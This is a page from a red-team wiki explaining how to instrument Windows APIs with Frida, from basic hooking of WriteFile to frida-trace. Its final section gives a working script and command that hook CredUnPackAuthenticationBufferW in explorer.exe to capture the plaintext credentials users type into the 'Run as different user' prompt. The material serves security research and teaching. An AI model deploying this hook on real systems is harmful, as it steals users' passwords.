Red Teaming Experiments
linkedingithub@spotheplanetpatreon
Search…
What is ired.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
Exfiltration
reversing, forensics & misc
Internals
Configuring Kernel Debugging Environment with kdnet and WinDBG Preview
Compiling a Simple Kernel Driver, DbgPrint, DbgView
Loading Windows Kernel Driver for Debugging
Subscribing to Process Creation, Thread Creation and Image Load Notifications from a Kernel Driver
Listing Open Handles and Finding Kernel Object Addresses
Sending Commands From Your Userland Program to Your Kernel Driver using IOCTL
Windows Kernel Drivers 101
Windows x64 Calling Convention: Stack Frame
Linux x64 Calling Convention: Stack Frame
System Service Descriptor Table - SSDT
Interrupt Descriptor Table - IDT
Token Abuse for Privilege Escalation in Kernel
Manipulating ActiveProcessLinks to Hide Processes in Userland
ETW: Event Tracing for Windows 101
Exploring Injected Threads
Parsing PE File Headers with C++
Instrumenting Windows APIs with Frida
Exploring Process Environment Block
Writing a Custom Bootloader
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered By GitBook
Instrumenting Windows APIs with Frida
​Frida is dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.

Spawning New Process with Frida

We can ask frida to spawn a new process for us to instrument:
1
frida c:\windows\system32\notepad.exe
Copied!

Attaching Frida to Existing Process

We can ask frida to attach to an existing process:
1
frida -p 10964
Copied!

Hooking a Function

The below code in hooking.js will find address of the Windows API WriteFile (lives in kernel32.dll/kernelbase.dll) and hexdump the contents of the 1st argument passed to it:
hooking.js
1
var writeFile = Module.getExportByName(null, "WriteFile");
2
​
3
Interceptor.attach(writeFile, {
4
onEnter: function(args)
5
{
6
console.log("Buffer dump:\n" + hexdump(args[1]));
7
// console.log("\nBuffer via Cstring:\n" + Memory.readCString(args[1]));
8
// console.log("\nBuffer via utf8String:\n" + Memory.readUtf8String(args[1]));
9
}
10
});
Copied!
Let's spawn a new notepad.exe through Frida and supply it with the above hooking.js code, so that we can start instrumenting the WriteFile API and inspect the contents of the buffer that is being written to disk:
1
frida C:\windows\system32\notepad.exe -l .\hooking.js
Copied!
Notice that we can update the hooking.js code and the instrumentation happens instantly - it does not require us to re-spawn the notepad or re-attaching Frida to it. In the above GIF, this can be seen at the end when we request the console to spit out the process.id (the frida is attached to) and the notepad process ID gets printed out to the screen instantly.

Frida-Trace

If we want to see if certain API calls are invoked by some specific process, say WriteFile, we can use frida-trace tool like so:
1
frida-trace -i "WriteFile" C:\windows\system32\notepad.exe
Copied!

Real Life Example - Intercepting Credentials

Below shows how we can combine the above knowledge for something a bit more interesting.
Can we intercept the plaintext credentials from the credentials prompt the user gets when they want to execute a program as another user?
Credentials prompt presented for "Run as different user"
The answer is of course yes, so let's see how this could be done using Frida tools.
Let's use frida-trace to see if explorer.exe ever calls any functions named *Cred* when we invoke the credentials popup:
1
frida-trace -i "*Cred*" -p (ps explorer).id
Copied!
Below, we can see that indeed, there is a call to CredUIPromptForWindowsCredentialsW made when the prompt is first invoked:
Entering some fake credentials shows the following interesting Cred* API calls are made (in red):
...and the CredUnPackAuthenticationBufferW (in lime) is of special interest, because per MSDN:
The CredUnPackAuthenticationBuffer function converts an authentication buffer returned by a call to the CredUIPromptForWindowsCredentials function into a string user name and password.
We can now instrument CredUnPackAuthenticationBufferW in a frida javascript like so:
Credentials.js
1
var username;
2
var password;
3
var CredUnPackAuthenticationBufferW = Module.findExportByName("Credui.dll", "CredUnPackAuthenticationBufferW")
4
​
5
Interceptor.attach(CredUnPackAuthenticationBufferW, {
6
onEnter: function (args)
7
{
8
// Credentials here are still encrypted
9
/*
10
CREDUIAPI BOOL CredUnPackAuthenticationBufferW(
11
0 DWORD dwFlags,
12
1 PVOID pAuthBuffer,
13
2 DWORD cbAuthBuffer,
14
3 LPWSTR pszUserName,
15
4 DWORD *pcchMaxUserName,
16
5 LPWSTR pszDomainName,
17
6 DWORD *pcchMaxDomainName,
18
7 LPWSTR pszPassword,
19
8 DWORD *pcchMaxPassword
20
);
21
*/
22
username = args[3];
23
password = args[7];
24
},
25
onLeave: function (result)
26
{
27
// Credentials are now decrypted
28
var user = username.readUtf16String()
29
var pass = password.readUtf16String()
30
​
31
if (user && pass)
32
{
33
console.log("\n+ Intercepted Credentials\n" + user + ":" + pass)
34
}
35
}
36
});
Copied!
We can now hook the explorer.exe by providing frida with our instrumentation script like so:
1
frida -p (ps explorer).id -l C:\labs\frida\hello-world\credentials.js
Copied!
With CredUnPackAuthenticationBufferW instrumented, entering credentials in the prompt launched by explorer.exe, gives us the expected result - the credentials are seen in plaintext:

Resources

JavaScript API
Frida • A world-class dynamic instrumentation framework
Previous
Parsing PE File Headers with C++
Next
Exploring Process Environment Block
Last modified 1yr ago
Copy link
Contents
Spawning New Process with Frida
Attaching Frida to Existing Process
Hooking a Function
Frida-Trace
Real Life Example - Intercepting Credentials
Resources